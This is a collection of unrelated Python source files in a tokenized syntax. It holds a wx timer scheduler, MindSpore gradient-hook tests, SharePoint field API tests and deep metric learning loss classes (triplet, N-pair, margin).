Should be called when destroying wx controls to prevent accessing
dead wx objects in actions that might be pending.
"""<for_stmt>timer self._timers<block_start>timer.Stop()<block_end><block_end><def_stmt>_wxtimer_schedule self time action state periodic=<false><block_start>scheduler=self<line_sep>msecs=self.to_relative(time)<line_sep>disposable=SingleAssignmentDisposable()<line_sep>periodic_state=[state]<def_stmt>interval <block_start><if_stmt>periodic<block_start>periodic_state[0]=action(periodic_state[0])<block_end><else_stmt><block_start>disposable.disposable=action(scheduler state)<block_end><block_end>log.debug("timeout: %s" msecs)<if_stmt>msecs<eq>0<block_start>msecs=1<block_end># wx.Timer doesn't support zero.
timer=self._timer_class(interval)<line_sep>timer.Start(msecs self.wx.TIMER_CONTINUOUS<if>periodic<else>self.wx.TIMER_ONE_SHOT)<line_sep>self._timers.add(timer)<def_stmt>dispose <block_start>timer.Stop()<line_sep>self._timers.remove(timer)<block_end><return>CompositeDisposable(disposable Disposable.create(dispose))<block_end><def_stmt>schedule self action state=<none><block_start>"""Schedules an action to be executed."""<line_sep><return>self._wxtimer_schedule(0 action state)<block_end><def_stmt>schedule_relative self duetime action state=<none><block_start>"""Schedules an action to be executed after duetime.
Keyword arguments:
duetime -- {timedelta} Relative time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""<line_sep><return>self._wxtimer_schedule(duetime action state)<block_end><def_stmt>schedule_absolute self duetime action state=<none><block_start>"""Schedules an action to be executed at duetime.
Keyword arguments:
duetime -- {datetime} Absolute time after which to execute the action.
action -- {Function} Action to be executed.
Returns {Disposable} The disposable object used to cancel the scheduled
action (best effort)."""<line_sep>duetime=self.to_datetime(duetime)<line_sep><return>self._wxtimer_schedule(duetime action state)<block_end><def_stmt>schedule_periodic self period action state=<none><block_start>"""Schedules a periodic piece of work to be executed in the Qt
mainloop.
Keyword arguments:
period -- Period in milliseconds for running the work periodically.
action -- Action to be executed.
state -- [Optional] Initial state passed to the action upon the first
iteration.
Returns the disposable object used to cancel the scheduled recurring
action (best effort)."""<line_sep><return>self._wxtimer_schedule(period action state periodic=<true>)<block_end><block_end> |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>mindspore.nn<as>nn<import_stmt>mindspore.common.dtype<as>mstype<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore context<import_from_stmt>mindspore ParameterTuple<import_from_stmt>mindspore.nn Momentum<import_from_stmt>mindspore.nn WithLossCell<import_from_stmt>mindspore.ops composite<as>C<import_from_stmt>mindspore.ops operations<as>P<import_from_stmt>mindspore.common.initializer TruncatedNormal<line_sep>context.set_context(mode=context.PYNATIVE_MODE device_target="Ascend")<line_sep>grad_all=C.GradOperation(get_all=<true>)<def_stmt>weight_variable <block_start>"""weight initial"""<line_sep><return>TruncatedNormal(0.02)<block_end><def_stmt>conv in_channels out_channels kernel_size stride=1 padding=0<block_start>"""weight initial for conv layer"""<line_sep>weight=weight_variable()<line_sep><return>nn.Conv2d(in_channels out_channels kernel_size=kernel_size stride=stride padding=padding weight_init=weight has_bias=<false> pad_mode="valid")<block_end><def_stmt>fc_with_initialize input_channels out_channels<block_start>"""weight initial for fc layer"""<line_sep>weight=weight_variable()<line_sep>bias=weight_variable()<line_sep><return>nn.Dense(input_channels out_channels weight bias)<block_end><class_stmt>test_custom_hook_function_base()<block_start><def_stmt>__init__ self<block_start><pass><block_end><def_stmt>test_custom_hook_function self hook_function cell_hook_function<block_start><return>hook_function cell_hook_function<block_end><block_end><def_stmt>cell_hook_function_print_grad cell_id grad_input grad_output<block_start><assert_stmt>grad_output[0].asnumpy().shape<eq>(32 6 14 14)<assert_stmt>grad_input[0].asnumpy().shape<eq>(32 16 10 10)<block_end><def_stmt>custom_hook_function_print_and_save_grad grad_out<block_start><assert_stmt>grad_out[0].asnumpy().shape<eq>(32 6 28 28)<block_end><class_stmt>LeNet5(nn.Cell)<block_start><def_stmt>__init__ self hook_function cell_hook_function num_class=10<block_start>super(LeNet5 self).__init__()<line_sep>self.num_class=num_class<line_sep>self.batch_size=32<line_sep>self.conv1=conv(1 6 5)<line_sep>self.conv2=conv(6 16 5)<line_sep>self.conv1.register_backward_hook(cell_hook_function)<line_sep>self.fc1=fc_with_initialize(16<times>5<times>5 120)<line_sep>self.fc2=fc_with_initialize(120 84)<line_sep>self.fc3=fc_with_initialize(84 self.num_class)<line_sep>self.relu=nn.ReLU()<line_sep>self.max_pool2d=nn.MaxPool2d(kernel_size=2 stride=2)<line_sep>self.reshape=P.Reshape()<line_sep>self.hook=P.HookBackward(hook_function)<block_end><def_stmt>construct self x<block_start>x=self.conv1(x)<line_sep>x=self.relu(x)<line_sep>x=self.hook(x)<line_sep>x=self.max_pool2d(x)<line_sep>x=self.conv2(x)<line_sep>x=self.relu(x)<line_sep>x=self.max_pool2d(x)<line_sep>x=self.reshape(x (self.batch_size -1))<line_sep>x=self.fc1(x)<line_sep>x=self.relu(x)<line_sep>x=self.fc2(x)<line_sep>x=self.relu(x)<line_sep>x=self.fc3(x)<line_sep><return>x<block_end><block_end><class_stmt>GradWrap(nn.Cell)<block_start>""" GradWrap definition """<def_stmt>__init__ self network<block_start>super(GradWrap self).__init__(auto_prefix=<false>)<line_sep>self.network=network<line_sep>self.weights=ParameterTuple(filter(<lambda>x:x.requires_grad network.get_parameters()))<block_end><def_stmt>construct self x label<block_start>weights=self.weights<line_sep><return>C.GradOperation(get_by_list=<true>)(self.network weights)(x label)<block_end><block_end><class_stmt>test_custom_cell_base()<block_start><def_stmt>__init__ self<block_start><pass><block_end><def_stmt>test_custom_cell_function self cell<block_start><return>cell<block_end><block_end><class_stmt>MulAdd(nn.Cell)<block_start><def_stmt>construct self x y<block_start><return>2<times>x+y<block_end><def_stmt>bprop self x y out dout<block_start><assert_stmt>x.asnumpy()<eq>1.0<assert_stmt>y.asnumpy()<eq>2.0<assert_stmt>out.asnumpy()<eq>4.0<assert_stmt>dout.asnumpy()<eq>1.0<line_sep><return>dout y<block_end><block_end><class_stmt>Ms_Cell(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Ms_Cell self).__init__()<line_sep>self.relu=P.ReLU()<block_end><def_stmt>construct self x<block_start><return>self.relu(x)<block_end><def_stmt>bprop self x out dout<block_start>dout=Tensor(np.float32(0.0))<assert_stmt>dout.shape<eq>()<line_sep><return>dout<block_end><block_end><class_stmt>Ms_Cell_Change_Shape(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Ms_Cell_Change_Shape self).__init__()<line_sep>self.relu=P.ReLU()<block_end><def_stmt>construct self x<block_start><return>self.relu(x)<block_end><def_stmt>bprop self x out dout<block_start>dout=Tensor(np.ones([5 5]).astype(np.float32))<assert_stmt>dout.shape<eq>(5 5)<line_sep><return>dout<block_end><block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_lenet_train_hook_function_print_and_save_grad <block_start>hook=test_custom_hook_function_base()<line_sep>function=hook.test_custom_hook_function(custom_hook_function_print_and_save_grad cell_hook_function_print_grad)<line_sep>net=LeNet5(hook_function=function[0] cell_hook_function=function[1])<line_sep>optimizer=Momentum(filter(<lambda>x:x.requires_grad net.get_parameters()) 0.1 0.9)<line_sep>criterion=nn.SoftmaxCrossEntropyWithLogits(sparse=<false>)<line_sep>net_with_criterion=WithLossCell(net criterion)<line_sep>train_network=GradWrap(net_with_criterion)<line_sep>train_network.set_train()<line_sep>input_data=Tensor(np.ones([net.batch_size 1 32 32]).astype(np.float32)<times>0.01)<line_sep>label=Tensor(np.ones([net.batch_size net.num_class]).astype(np.float32))<line_sep>output=net(Tensor(input_data))<line_sep>criterion(output label)<line_sep>grads=train_network(input_data label)<line_sep>success=optimizer(grads)<assert_stmt>success<block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_custom_bprop_and_Cell_MulAdd <block_start>custom_cell=test_custom_cell_base()<line_sep>mul_add=custom_cell.test_custom_cell_function(MulAdd())<line_sep>mul_add.bprop_debug=<true><line_sep>grad_all(mul_add)(Tensor(1 mstype.float32) Tensor(2 mstype.float32))<assert_stmt>grad_all(mul_add)(Tensor(1 mstype.float32) Tensor(2 mstype.float32))<eq>(Tensor(1.0 mstype.float32) Tensor(2.0 mstype.float32))<block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_custom_bprop_and_Cell_Ms_Cell_Change_Shape <block_start>custom_cell=test_custom_cell_base()<line_sep>ms_Cell=custom_cell.test_custom_cell_function(Ms_Cell_Change_Shape())<line_sep>ms_Cell.bprop_debug=<true><with_stmt>pytest.raises(RuntimeError)<as>ex<block_start>grad_all(ms_Cell)(Tensor(1 mstype.float32))<block_end><assert_stmt>"Shapes of input and parameter are different, input index"<in>str(ex.value)<block_end>@pytest.mark.level1@pytest.mark.platform_arm_ascend_training@pytest.mark.platform_x86_ascend_training@pytest.mark.env_onecard<def_stmt>test_pynative_custom_bprop_and_Cell_Ms_Cell <block_start>custom_cell=test_custom_cell_base()<line_sep>ms_Cell=custom_cell.test_custom_cell_function(Ms_Cell())<line_sep>ms_Cell.bprop_debug=<true><assert_stmt>grad_all(ms_Cell)(Tensor(1 mstype.float32))<eq>(Tensor(0.0 mstype.float32) )<block_end> |
<import_stmt>uuid<import_from_stmt>tests.sharepoint.sharepoint_case SPTestCase<import_from_stmt>office365.sharepoint.fields.field Field<import_from_stmt>office365.sharepoint.fields.field_creation_information FieldCreationInformation<import_from_stmt>office365.sharepoint.fields.field_text FieldText<import_from_stmt>office365.sharepoint.fields.field_type FieldType<class_stmt>TestField(SPTestCase)<block_start>target_field=<none># type: Field
target_field_name="Title"<def_stmt>test_1_get_site_fields self<block_start>site_fields=self.client.site.root_web.fields.top(2).get().execute_query()<line_sep>self.assertGreater(len(site_fields) 0)<block_end><def_stmt>test_2_get_field self<block_start>title_field=self.client.site.root_web.fields.get_by_internal_name_or_title(self.target_field_name).get().execute_query()<line_sep>self.assertIsNotNone(title_field.internal_name)<line_sep>self.assertEqual(title_field.internal_name self.target_field_name)<line_sep>self.assertIsInstance(title_field FieldText)<line_sep>self.assertIsNotNone(title_field.max_length)<block_end><def_stmt>test_3_get_field_by_title self<block_start>title_field=self.client.site.root_web.fields.get_by_title(self.target_field_name).get().execute_query()<line_sep>self.assertIsNotNone(title_field.internal_name)<line_sep>self.assertEqual(title_field.internal_name self.target_field_name)<block_end><def_stmt>test_4_create_site_field self<block_start>field_name="Title_"+uuid.uuid4().hex<line_sep>create_field_info=FieldCreationInformation(field_name FieldType.Text)<line_sep>created_field=self.client.site.root_web.fields.add(create_field_info).execute_query()<line_sep>self.assertEqual(created_field.properties["Title"] field_name)<line_sep>self.__class__.target_field=created_field<block_end><def_stmt>test_5_update_site_field self<block_start>field_to_update=self.__class__.target_field<line_sep>updated_field_name="Title_"+uuid.uuid4().hex<line_sep>field_to_update.set_property('Title' updated_field_name).update().execute_query()<line_sep>updated_field=self.client.site.root_web.fields.get_by_title(updated_field_name).get().execute_query()<line_sep>self.assertIsNotNone(updated_field.id)<line_sep>self.assertEqual(updated_field.title updated_field_name)<block_end><def_stmt>test_6_delete_site_field self<block_start>field_to_delete=self.__class__.target_field<line_sep>field_to_delete.delete_object().execute_query()<block_end><block_end> |
# Copyright 2019 <NAME> and <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###################### LIBRARIES #################################################
<import_stmt>warnings<line_sep>warnings.filterwarnings("ignore")<import_stmt>torch random itertools<as>it numpy<as>np faiss random<import_from_stmt>tqdm tqdm<import_from_stmt>scipy.spatial.distance cdist<import_from_stmt>sklearn.decomposition PCA<import_from_stmt>sklearn.preprocessing normalize<import_from_stmt>PIL Image<line_sep>"""================================================================================================="""<line_sep>############ LOSS SELECTION FUNCTION #####################
<def_stmt>loss_select loss opt to_optim<block_start>"""
Selection function which returns the respective criterion while appending to list of trainable parameters if required.
Args:
loss: str, name of loss function to return.
opt: argparse.Namespace, contains all training-specific parameters.
to_optim: list of trainable parameters. Is extend if loss function contains those as well.
Returns:
criterion (torch.nn.Module inherited), to_optim (optionally appended)
"""<if_stmt>loss<eq>'triplet'<block_start>loss_params={'margin':opt.margin 'sampling_method':opt.sampling}<line_sep>criterion=TripletLoss(**loss_params)<block_end><elif_stmt>loss<eq>'npair'<block_start>loss_params={'l2':opt.l2npair}<line_sep>criterion=NPairLoss(**loss_params)<block_end><elif_stmt>loss<eq>'marginloss'<block_start>loss_params={'margin':opt.margin 'nu':opt.nu 'beta':opt.beta 'n_classes':opt.num_classes 'sampling_method':opt.sampling}<line_sep>criterion=MarginLoss(**loss_params)<line_sep>to_optim<augadd>[{'params':criterion.parameters() 'lr':opt.beta_lr 'weight_decay':0}]<block_end><elif_stmt>loss<eq>'proxynca'<block_start>loss_params={'num_proxies':opt.num_classes 'embedding_dim':opt.classembed<if>'num_cluster'<in>vars(opt).keys()<else>opt.embed_dim}<line_sep>criterion=ProxyNCALoss(**loss_params)<line_sep>to_optim<augadd>[{'params':criterion.parameters() 'lr':opt.proxy_lr}]<block_end><elif_stmt>loss<eq>'crossentropy'<block_start>loss_params={'n_classes':opt.num_classes 'inp_dim':opt.embed_dim}<line_sep>criterion=CEClassLoss(**loss_params)<line_sep>to_optim<augadd>[{'params':criterion.parameters() 'lr':opt.lr 'weight_decay':0}]<block_end><else_stmt><block_start><raise>Exception('Loss {} not available!'.format(loss))<block_end><return>criterion to_optim<block_end>"""================================================================================================="""<line_sep>######### MAIN SAMPLER CLASS #################################
<class_stmt>TupleSampler()<block_start>"""
Container for all sampling methods that can be used in conjunction with the respective loss functions.
Based on batch-wise sampling, i.e. given a batch of training data, sample useful data tuples that are
used to train the network more efficiently.
"""<def_stmt>__init__ self method='random'<block_start>"""
Args:
method: str, name of sampling method to use.
Returns:
Nothing!
"""<line_sep>self.method=method<if_stmt>method<eq>'semihard'<block_start>self.give=self.semihardsampling<block_end><if_stmt>method<eq>'softhard'<block_start>self.give=self.softhardsampling<block_end><elif_stmt>method<eq>'distance'<block_start>self.give=self.distanceweightedsampling<block_end><elif_stmt>method<eq>'npair'<block_start>self.give=self.npairsampling<block_end><elif_stmt>method<eq>'random'<block_start>self.give=self.randomsampling<block_end><block_end><def_stmt>randomsampling self batch labels<block_start>"""
This methods finds all available triplets in a batch given by the classes provided in labels, and randomly
selects <len(batch)> triplets.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().numpy()<block_end>unique_classes=np.unique(labels)<line_sep>indices=np.arange(len(batch))<line_sep>class_dict={i:indices[labels<eq>i]<for>i unique_classes}<line_sep>sampled_triplets=[list(it.product([x] [x] [y<for>y unique_classes<if>x<ne>y]))<for>x unique_classes]<line_sep>sampled_triplets=[x<for>y sampled_triplets<for>x y]<line_sep>sampled_triplets=[[x<for>x list(it.product(*[class_dict[j]<for>j i]))<if>x[0]<ne>x[1]]<for>i sampled_triplets]<line_sep>sampled_triplets=[x<for>y sampled_triplets<for>x y]<line_sep>#NOTE: The number of possible triplets is given by #unique_classes*(2*(samples_per_class-1)!)*(#unique_classes-1)*samples_per_class
sampled_triplets=random.sample(sampled_triplets batch.shape[0])<line_sep><return>sampled_triplets<block_end><def_stmt>semihardsampling self batch labels margin=0.2<block_start><if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().numpy()<block_end>bs=batch.size(0)<line_sep>#Return distance matrix for all elements in batch (BSxBS)
distances=self.pdist(batch.detach()).detach().cpu().numpy()<line_sep>positives,negatives=[] []<line_sep>anchors=[]<for_stmt>i range(bs)<block_start>l,d=labels[i] distances[i]<line_sep>neg=labels<ne>l<line_sep>pos=labels<eq>l<line_sep>anchors.append(i)<line_sep>pos[i]=<false><line_sep>p=np.random.choice(np.where(pos)[0])<line_sep>positives.append(p)<line_sep>#Find negatives that violate tripet constraint semi-negatives
neg_mask=np.logical_and(neg d<g>d[p])<line_sep>neg_mask=np.logical_and(neg_mask d<l>margin+d[p])<if_stmt>neg_mask.sum()<g>0<block_start>negatives.append(np.random.choice(np.where(neg_mask)[0]))<block_end><else_stmt><block_start>negatives.append(np.random.choice(np.where(neg)[0]))<block_end><block_end>sampled_triplets=[[a p n]<for>a,p,n zip(anchors positives negatives)]<line_sep><return>sampled_triplets<block_end><def_stmt>softhardsampling self batch labels<block_start>"""
This methods finds all available triplets in a batch given by the classes provided in labels, and select
triplets based on semihard sampling introduced in 'https://arxiv.org/pdf/1503.03832.pdf'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().numpy()<block_end>bs=batch.size(0)<line_sep>#Return distance matrix for all elements in batch (BSxBS)
distances=self.pdist(batch.detach()).detach().cpu().numpy()<line_sep>positives,negatives=[] []<line_sep>anchors=[]<for_stmt>i range(bs)<block_start>l,d=labels[i] distances[i]<line_sep>anchors.append(i)<line_sep>#1 for batchelements with label l
neg=labels<ne>l<line_sep>pos=labels<eq>l<line_sep>#0 for current anchor
pos[i]=<false><line_sep>#Find negatives that violate triplet constraint semi-negatives
neg_mask=np.logical_and(neg d<l>d[np.where(pos)[0]].max())<line_sep>#Find positives that violate triplet constraint semi-hardly
pos_mask=np.logical_and(pos d<g>d[np.where(neg)[0]].min())<if_stmt>pos_mask.sum()<g>0<block_start>positives.append(np.random.choice(np.where(pos_mask)[0]))<block_end><else_stmt><block_start>positives.append(np.random.choice(np.where(pos)[0]))<block_end><if_stmt>neg_mask.sum()<g>0<block_start>negatives.append(np.random.choice(np.where(neg_mask)[0]))<block_end><else_stmt><block_start>negatives.append(np.random.choice(np.where(neg)[0]))<block_end><block_end>sampled_triplets=[[a p n]<for>a,p,n zip(anchors positives negatives)]<line_sep><return>sampled_triplets<block_end><def_stmt>distanceweightedsampling self batch labels lower_cutoff=0.5 upper_cutoff=1.4<block_start>"""
This methods finds all available triplets in a batch given by the classes provided in labels, and select
triplets based on distance sampling introduced in 'Sampling Matters in Deep Embedding Learning'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
lower_cutoff: float, lower cutoff value for negatives that are too close to anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
upper_cutoff: float, upper cutoff value for positives that are too far away from the anchor embeddings. Set to literature value. They will be assigned a zero-sample probability.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().cpu().numpy()<block_end>bs=batch.shape[0]<line_sep>distances=self.pdist(batch.detach()).clamp(min=lower_cutoff)<line_sep>positives,negatives=[] []<line_sep>labels_visited=[]<line_sep>anchors=[]<for_stmt>i range(bs)<block_start>neg=labels<ne>labels[i]<line_sep>pos=labels<eq>labels[i]<line_sep>q_d_inv=self.inverse_sphere_distances(batch distances[i] labels labels[i])<line_sep>#Sample positives randomly
pos[i]=0<line_sep>positives.append(np.random.choice(np.where(pos)[0]))<line_sep>#Sample negatives by distance
negatives.append(np.random.choice(bs p=q_d_inv))<block_end>sampled_triplets=[[a p n]<for>a,p,n zip(list(range(bs)) positives negatives)]<line_sep><return>sampled_triplets<block_end><def_stmt>npairsampling self batch labels<block_start>"""
This methods finds N-Pairs in a batch given by the classes provided in labels in the
creation fashion proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'.
Args:
batch: np.ndarray or torch.Tensor, batch-wise embedded training samples.
labels: np.ndarray or torch.Tensor, ground truth labels corresponding to batch.
Returns:
list of sampled data tuples containing reference indices to the position IN THE BATCH.
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().cpu().numpy()<block_end>label_set,count=np.unique(labels return_counts=<true>)<line_sep>label_set=label_set[count<ge>2]<line_sep>pos_pairs=np.array([np.random.choice(np.where(labels<eq>x)[0] 2 replace=<false>)<for>x label_set])<line_sep>neg_tuples=[]<for_stmt>idx range(len(pos_pairs))<block_start>neg_tuples.append(pos_pairs[np.delete(np.arange(len(pos_pairs)) idx) 1])<block_end>neg_tuples=np.array(neg_tuples)<line_sep>sampled_npairs=[[a p *list(neg)]<for>(a p),neg zip(pos_pairs neg_tuples)]<line_sep><return>sampled_npairs<block_end><def_stmt>pdist self A<block_start>"""
Efficient function to compute the distance matrix for a matrix A.
Args:
A: Matrix/Tensor for which the distance matrix is to be computed.
eps: float, minimal distance/clampling value to ensure no zero values.
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""<line_sep>prod=torch.mm(A A.t())<line_sep>norm=prod.diag().unsqueeze(1).expand_as(prod)<line_sep>res=(norm+norm.t()-2<times>prod).clamp(min=0)<line_sep><return>res.clamp(min=0).sqrt()<block_end><def_stmt>inverse_sphere_distances self batch dist labels anchor_label<block_start>"""
Function to utilise the distances of batch samples to compute their
probability of occurence, and using the inverse to sample actual negatives to the resp. anchor.
Args:
batch: torch.Tensor(), batch for which the sampling probabilities w.r.t to the anchor are computed. Used only to extract the shape.
dist: torch.Tensor(), computed distances between anchor to all batch samples.
labels: np.ndarray, labels for each sample for which distances were computed in dist.
anchor_label: float, anchor label
Returns:
distance_matrix, clamped to ensure no zero values are passed.
"""<line_sep>bs,dim=len(dist) batch.shape[-1]<line_sep>#negated log-distribution of distances of unit sphere in dimension <dim>
log_q_d_inv=((2.0-float(dim))<times>torch.log(dist)-(float(dim-3)/2)<times>torch.log(1.0-0.25<times>(dist.pow(2))))<line_sep>#Set sampling probabilities of positives to zero
log_q_d_inv[np.where(labels<eq>anchor_label)[0]]=0<line_sep>q_d_inv=torch.exp(log_q_d_inv-torch.max(log_q_d_inv))# - max(log) for stability
#Set sampling probabilities of positives to zero
q_d_inv[np.where(labels<eq>anchor_label)[0]]=0<line_sep>### NOTE: Cutting of values with high distances made the results slightly worse.
# q_d_inv[np.where(dist>upper_cutoff)[0]] = 0
#Normalize inverted distance for probability distr.
q_d_inv=q_d_inv/q_d_inv.sum()<line_sep><return>q_d_inv.detach().cpu().numpy()<block_end><block_end>"""================================================================================================="""<line_sep>### Standard Triplet Loss, finds triplets in Mini-batches.
<class_stmt>TripletLoss(torch.nn.Module)<block_start><def_stmt>__init__ self margin=1 sampling_method='random'<block_start>"""
Basic Triplet Loss as proposed in 'FaceNet: A Unified Embedding for Face Recognition and Clustering'
Args:
margin: float, Triplet Margin - Ensures that positives aren't placed arbitrarily close to the anchor.
Similarl, negatives should not be placed arbitrarily far away.
sampling_method: Method to use for sampling training triplets. Used for the TupleSampler-class.
"""<line_sep>super(TripletLoss self).__init__()<line_sep>self.margin=margin<line_sep>self.sampler=TupleSampler(method=sampling_method)<block_end><def_stmt>triplet_distance self anchor positive negative<block_start>"""
Compute triplet loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
triplet loss (torch.Tensor())
"""<line_sep><return>torch.nn.functional.relu((anchor-positive).pow(2).sum()-(anchor-negative).pow(2).sum()+self.margin)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
triplet loss (torch.Tensor(), batch-averaged)
"""<line_sep>#Sample triplets to use for training.
sampled_triplets=self.sampler.give(batch labels)<line_sep>#Compute triplet loss
loss=torch.stack([self.triplet_distance(batch[triplet[0] :] batch[triplet[1] :] batch[triplet[2] :])<for>triplet sampled_triplets])<line_sep><return>torch.mean(loss)<block_end><block_end>"""================================================================================================="""<line_sep>### Standard N-Pair Loss.
<class_stmt>NPairLoss(torch.nn.Module)<block_start><def_stmt>__init__ self l2=0.02<block_start>"""
Basic N-Pair Loss as proposed in 'Improved Deep Metric Learning with Multi-class N-pair Loss Objective'
Args:
l2: float, weighting parameter for weight penality due to embeddings not being normalized.
Returns:
Nothing!
"""<line_sep>super(NPairLoss self).__init__()<line_sep>self.sampler=TupleSampler(method='npair')<line_sep>self.l2=l2<block_end><def_stmt>npair_distance self anchor positive negatives<block_start>"""
Compute basic N-Pair loss.
Args:
anchor, positive, negative: torch.Tensor(), resp. embeddings for anchor, positive and negative samples.
Returns:
n-pair loss (torch.Tensor())
"""<line_sep><return>torch.log(1+torch.sum(torch.exp(anchor.mm((negatives-positive).transpose(0 1)))))<block_end><def_stmt>weightsum self anchor positive<block_start>"""
Compute weight penalty.
NOTE: Only need to penalize anchor and positive since the negatives are created based on these.
Args:
anchor, positive: torch.Tensor(), resp. embeddings for anchor and positive samples.
Returns:
torch.Tensor(), Weight penalty
"""<line_sep><return>torch.sum(anchor<power>2+positive<power>2)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
n-pair loss (torch.Tensor(), batch-averaged)
"""<line_sep>#Sample N-Pairs
sampled_npairs=self.sampler.give(batch labels)<line_sep>#Compute basic n=pair loss
loss=torch.stack([self.npair_distance(batch[npair[0]:npair[0]+1 :] batch[npair[1]:npair[1]+1 :] batch[npair[2:] :])<for>npair sampled_npairs])<line_sep>#Include weight penalty
loss=loss+self.l2<times>torch.mean(torch.stack([self.weightsum(batch[npair[0] :] batch[npair[1] :])<for>npair sampled_npairs]))<line_sep><return>torch.mean(loss)<block_end><block_end>"""================================================================================================="""<line_sep>### MarginLoss with trainable class separation margin beta. Runs on Mini-batches as well.
<class_stmt>MarginLoss(torch.nn.Module)<block_start><def_stmt>__init__ self margin=0.2 nu=0 beta=1.2 n_classes=100 beta_constant=<false> sampling_method='distance'<block_start>"""
Basic Margin Loss as proposed in 'Sampling Matters in Deep Embedding Learning'.
Args:
margin: float, fixed triplet margin (see also TripletLoss).
nu: float, regularisation weight for beta. Zero by default (in literature as well).
beta: float, initial value for trainable class margins. Set to default literature value.
n_classes: int, number of target class. Required because it dictates the number of trainable class margins.
beta_constant: bool, set to True if betas should not be trained.
sampling_method: str, sampling method to use to generate training triplets.
Returns:
Nothing!
"""<line_sep>super(MarginLoss self).__init__()<line_sep>self.margin=margin<line_sep>self.n_classes=n_classes<line_sep>self.beta_constant=beta_constant<line_sep>self.beta_val=beta<line_sep>self.beta=beta<if>beta_constant<else>torch.nn.Parameter(torch.ones(n_classes)<times>beta)<line_sep>self.nu=nu<line_sep>self.sampling_method=sampling_method<line_sep>self.sampler=TupleSampler(method=sampling_method)<block_end><def_stmt>forward self batch labels<block_start>"""
Args:
batch: torch.Tensor() [(BS x embed_dim)], batch of embeddings
labels: np.ndarray [(BS x 1)], for each element of the batch assigns a class [0,...,C-1]
Returns:
margin loss (torch.Tensor(), batch-averaged)
"""<if_stmt>isinstance(labels torch.Tensor)<block_start>labels=labels.detach().cpu().numpy()<block_end>sampled_triplets=self.sampler.give(batch labels)<line_sep>#Compute distances between anchor-positive and anchor-negative.
d_ap,d_an=[] []<for_stmt>triplet sampled_triplets<block_start>train_triplet={'Anchor':batch[triplet[0] :] 'Positive':batch[triplet[1] :] 'Negative':batch[triplet[2]]}<line_sep>pos_dist=((train_triplet['Anchor']-train_triplet['Positive']).pow(2).sum()+1e-8).pow(1/2)<line_sep>neg_dist=((train_triplet['Anchor']-train_triplet['Negative']).pow(2).sum()+1e-8).pow(1/2)<line_sep>d_ap.append(pos_dist)<line_sep>d_an.append(neg_dist)<block_end>d_ap,d_an=torch.stack(d_ap) torch.stack(d_an)<line_sep>#Group betas together by anchor class in sampled triplets (as each beta belongs to one class).
<if_stmt>self.beta_constant<block_start>beta=self.beta<block_end><else_stmt><block_start>beta=torch.stack([self.beta[labels[triplet[0]]]<for>triplet sampled_triplets]).type(torch.cuda.FloatTensor)<block_end>#Compute actual margin postive and margin negative loss
pos_loss=torch.nn.functional.relu(d_ap-beta+self.margin)<line_sep>neg_loss=torch.nn.functional.relu(beta-d_an+self.margin)<line_sep>#Compute normalization constant
pair_count=torch.sum((pos_loss<g>0.)+(neg_loss<g>0.)).type(torch.cuda.FloatTensor)<line_sep>#Actual Margin Loss
loss=torch.sum(pos_loss+neg_loss)<if>pair_count<eq>0.<else>torch.sum(pos_loss+neg_loss)/pair_count<line_sep>#(Optional) Add regularization penalty on betas.
<if_stmt>self.nu<block_start>loss=loss+beta_regularisation_loss.type(torch.cuda.FloatTensor)<block_end><return>loss<block_end><block_end>"""================================================================================================="""<line_sep>### ProxyNCALoss containing trainable class proxies. Works independent of batch size.
